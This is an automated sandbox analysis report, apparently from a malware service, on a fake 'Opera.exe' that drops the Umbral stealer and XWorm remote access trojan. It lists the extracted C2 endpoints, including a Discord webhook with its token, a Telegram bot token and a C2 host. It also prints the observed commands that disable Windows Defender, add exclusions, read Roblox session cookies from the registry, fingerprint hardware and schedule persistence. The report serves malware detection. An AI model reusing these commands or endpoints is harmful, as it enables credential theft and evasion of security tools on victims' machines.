Analysis

  • max time kernel
    599s
  • max time network
    602s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64 arch:x86 image:win10-20240404-en locale:en-us os:windows10-1703-x64 system
  • submitted
    26-04-2024 13:15

General

  • Target

    Opera.exe

  • Size

    319KB

  • MD5

    f69924b642ac4b9ef1dfacdfd43759a9

  • SHA1

    95da50564c7cbc3749148419c68a08b0f2869ee1

  • SHA256

    d9b248ce98a243a37d33096fc7b1cad784ee77f5920b0bd6618a6690ca426f18

  • SHA512

    2334511265c507d16b3a323c721a392659feb405a5d9fea588146c4ef320261166312c2fcf8f494c4aa342e0b5a9d5da20576ce2d6ae1e3215ee47dcc19f5e07

  • SSDEEP

    6144:48loZMCrIkd8g+EtXHkv/iD4DDUgoOJBiLHaIJtM34b8e1mmiW2brXv5P:7oZRL+EP8DDUgoOJBiLHaIJtMQIL/5P

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2

Extracted

Family

xworm

C2

phentermine-partial.gl.at.ply.gg:36969

Attributes
  • Install_directory

    %AppData%

  • install_file

    Client.exe

  • telegram

    https://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y

Signatures

  • Detect Umbral payload 5 IoCs
  • Detect Xworm Payload 5 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 13 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Opera.exe
    "C:\Users\Admin\AppData\Local\Temp\Opera.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1116
    • C:\Users\Admin\AppData\Local\Temp\Umbral3.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:208
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
        3⤵
        • Views/modifies file attributes
        PID:2840
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:8
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2128
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4844
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4852
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4384
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:3800
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:1428
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:3540
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:5252
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause
            3⤵
              PID:4600
              • C:\Windows\system32\PING.EXE
                ping localhost
                4⤵
                • Runs ping.exe
                PID:5168
          • C:\Users\Admin\AppData\Local\Temp\XClient.exe
            "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
            2⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3172
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2892
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:1224
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:5320
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:5916
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"
              3⤵
              • Creates scheduled task(s)
              PID:5164
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe"
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:1880
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe"
            2⤵
            • Checks processor information in registry
            • Modifies registry class
            • NTFS ADS
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4404
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.0.785884306\520282606" -parentBuildID 20221007134813 -prefsHandle 1636 -prefMapHandle 1624 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2b27ca1-1d07-4130-9b46-2d90e87c56e6} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 1720 1f2931f4d58 gpu
              3⤵
                PID:2268
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.1.114254307\1143745263" -parentBuildID 20221007134813 -prefsHandle 2096 -prefMapHandle 2092 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97135303-6f31-474e-b0de-7fc9643e4482} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 2108 1f292b41958 socket
                3⤵
                  PID:3648
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.2.135195726\1258005419" -childID 1 -isForBrowser -prefsHandle 2760 -prefMapHandle 2968 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf445491-c395-438b-a880-e3f76ce4fac5} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 2944 1f297197558 tab
                  3⤵
                    PID:3964
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.3.693188196\2020291680" -childID 2 -isForBrowser -prefsHandle 3424 -prefMapHandle 3408 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca22dd52-3dad-478c-90d1-935503a1fdcf} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 3452 1f287e61f58 tab
                    3⤵
                      PID:3092
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.4.2076861460\1814433807" -childID 3 -isForBrowser -prefsHandle 4304 -prefMapHandle 4296 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1d24509-16a4-4d4a-bc21-c7a99d73984d} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4320 1f29921e358 tab
                      3⤵
                        PID:3660
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.5.784412914\1526721620" -childID 4 -isForBrowser -prefsHandle 4848 -prefMapHandle 4844 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc938f41-17fd-4a76-8870-7f37287291f8} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4800 1f287e62258 tab
                        3⤵
                          PID:5384
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.6.141288439\352932363" -childID 5 -isForBrowser -prefsHandle 4928 -prefMapHandle 4932 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {76de6abc-bcb3-4468-ba5a-dcc2db041487} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4884 1f299496758 tab
                          3⤵
                            PID:5392
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.7.319893757\1180504177" -childID 6 -isForBrowser -prefsHandle 5096 -prefMapHandle 5100 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c5b81f3-2add-45a9-8206-3932dd707e78} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4912 1f299496a58 tab
                            3⤵
                              PID:5400
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.8.538590279\47800966" -childID 7 -isForBrowser -prefsHandle 6088 -prefMapHandle 6084 -prefsLen 26593 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2943164-ddd4-4e86-942c-e19c63f1db72} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 5540 1f29ae86e58 tab
                              3⤵
                                PID:5212
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.9.290925440\879106275" -childID 8 -isForBrowser -prefsHandle 4956 -prefMapHandle 4952 -prefsLen 26593 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a5e67f4-9c56-468d-825a-fecb32bd0cdb} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 6132 1f29ae87a58 tab
                                3⤵
                                  PID:4908
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.10.1093434033\1828280291" -childID 9 -isForBrowser -prefsHandle 6216 -prefMapHandle 6240 -prefsLen 26593 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ce5add9-4239-41ba-9c63-2b03f8729b82} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 6316 1f29ae89e58 tab
                                  3⤵
                                    PID:5236
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.11.752001682\1145238142" -childID 10 -isForBrowser -prefsHandle 6500 -prefMapHandle 5016 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {70a45c95-38f3-4407-a532-a9cf137d2957} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4992 1f29342f858 tab
                                    3⤵
                                      PID:5436
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.12.1289579916\1137941508" -childID 11 -isForBrowser -prefsHandle 5288 -prefMapHandle 6312 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {72cc7662-f316-4635-a009-a2a660b2e83d} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 5180 1f299ba9958 tab
                                      3⤵
                                        PID:5816
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.13.240442987\989605971" -childID 12 -isForBrowser -prefsHandle 3972 -prefMapHandle 2504 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {97f741b7-7816-4330-8aa9-1535bcb29030} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 5196 1f29ad29158 tab
                                        3⤵
                                          PID:5440
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.14.1661367114\708816911" -childID 13 -isForBrowser -prefsHandle 10296 -prefMapHandle 10292 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {976df849-95bd-455c-94fb-fd8854218b3a} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 10304 1f29b124258 tab
                                          3⤵
                                            PID:5860
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.15.1886885090\1676064267" -childID 14 -isForBrowser -prefsHandle 10128 -prefMapHandle 2648 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {df02ce31-9c5d-4658-830f-0efacaa4ad29} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 6024 1f29af20458 tab
                                            3⤵
                                              PID:2988
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.16.967545651\1558656289" -childID 15 -isForBrowser -prefsHandle 10212 -prefMapHandle 10152 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5496fa6d-b453-4e7b-972d-4dbf8ca616aa} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 10160 1f29b2d2d58 tab
                                              3⤵
                                                PID:5160
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.17.293763883\1533402784" -childID 16 -isForBrowser -prefsHandle 4432 -prefMapHandle 4436 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {547af0a8-3666-4dd3-986d-86e1e6c5cd0b} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4324 1f29b2d3358 tab
                                                3⤵
                                                  PID:3864
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.18.1405195493\1341552779" -childID 17 -isForBrowser -prefsHandle 10128 -prefMapHandle 10148 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {33ade00c-ce6a-45e1-a633-e0ecedf3674f} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 9856 1f29b309558 tab
                                                  3⤵
                                                    PID:5316
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.19.824604785\1969642871" -childID 18 -isForBrowser -prefsHandle 10364 -prefMapHandle 4560 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0bc3241-c8dc-4ebb-9cdc-239d78d8197a} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4620 1f2994d4e58 tab
                                                    3⤵
                                                      PID:2592
                                                • C:\Users\Admin\AppData\Roaming\Client.exe
                                                  C:\Users\Admin\AppData\Roaming\Client.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:5792
                                                • C:\Windows\System32\rundll32.exe
                                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                  1⤵
                                                    PID:2300
                                                  • C:\Users\Admin\Downloads\Opera.exe
                                                    "C:\Users\Admin\Downloads\Opera.exe"
                                                    1⤵
                                                    • Executes dropped EXE
                                                    PID:5744
                                                    • C:\Users\Admin\AppData\Local\Temp\Umbral3.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
                                                      2⤵
                                                      • Drops file in Drivers directory
                                                      • Executes dropped EXE
                                                      PID:3040
                                                      • C:\Windows\SYSTEM32\attrib.exe
                                                        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
                                                        3⤵
                                                        • Views/modifies file attributes
                                                        PID:5808
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'
                                                        3⤵
                                                          PID:2540
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                          3⤵
                                                            PID:4216
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                            3⤵
                                                              PID:32
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                              3⤵
                                                                PID:2372
                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                "wmic.exe" os get Caption
                                                                3⤵
                                                                  PID:5648
                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                  "wmic.exe" computersystem get totalphysicalmemory
                                                                  3⤵
                                                                    PID:5180
                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                    "wmic.exe" csproduct get uuid
                                                                    3⤵
                                                                      PID:5808
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                      3⤵
                                                                        PID:3836
                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                        "wmic" path win32_VideoController get name
                                                                        3⤵
                                                                        • Detects videocard installed
                                                                        PID:2340
                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause
                                                                        3⤵
                                                                          PID:5584
                                                                          • C:\Windows\system32\PING.EXE
                                                                            ping localhost
                                                                            4⤵
                                                                            • Runs ping.exe
                                                                            PID:5272
                                                                    • C:\Users\Admin\AppData\Roaming\Client.exe
                                                                      C:\Users\Admin\AppData\Roaming\Client.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:4920
                                                                    • C:\Users\Admin\AppData\Roaming\Client.exe
                                                                      C:\Users\Admin\AppData\Roaming\Client.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:1540
                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                      C:\Windows\system32\AUDIODG.EXE 0x2ec
                                                                      1⤵
                                                                        PID:1960
                                                                      • C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:2300
                                                                      • C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:3080
                                                                      • C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:6092
                                                                      • C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:6104
                                                                      • C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:4392
                                                                      • C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        C:\Users\Admin\AppData\Roaming\Client.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:3508
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                        1⤵
                                                                        • Drops file in Windows directory
                                                                        • Modifies registry class
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:1788
                                                                      • C:\Windows\system32\browser_broker.exe
                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                        1⤵
                                                                        • Modifies Internet Explorer settings
                                                                        PID:4912
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Modifies registry class
                                                                        • Suspicious behavior: MapViewOfSection
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:5632
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Drops file in Windows directory
                                                                        • Modifies Internet Explorer settings
                                                                        • Modifies registry class
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:5520
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Drops file in Windows directory
                                                                        • Modifies registry class
                                                                        PID:404
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Drops file in Windows directory
                                                                        • Modifies registry class
                                                                        PID:2340
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Drops file in Windows directory
                                                                        • Modifies registry class
                                                                        PID:4892

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

                                                                        Filesize

                                                                        654B

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral3.exe.log

                                                                        Filesize

                                                                        1KB

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                        Filesize

                                                                        3KB

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\LICIZUQP\edgecompatviewlist[1].xml

                                                                        Filesize

                                                                        74KB

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Filesize

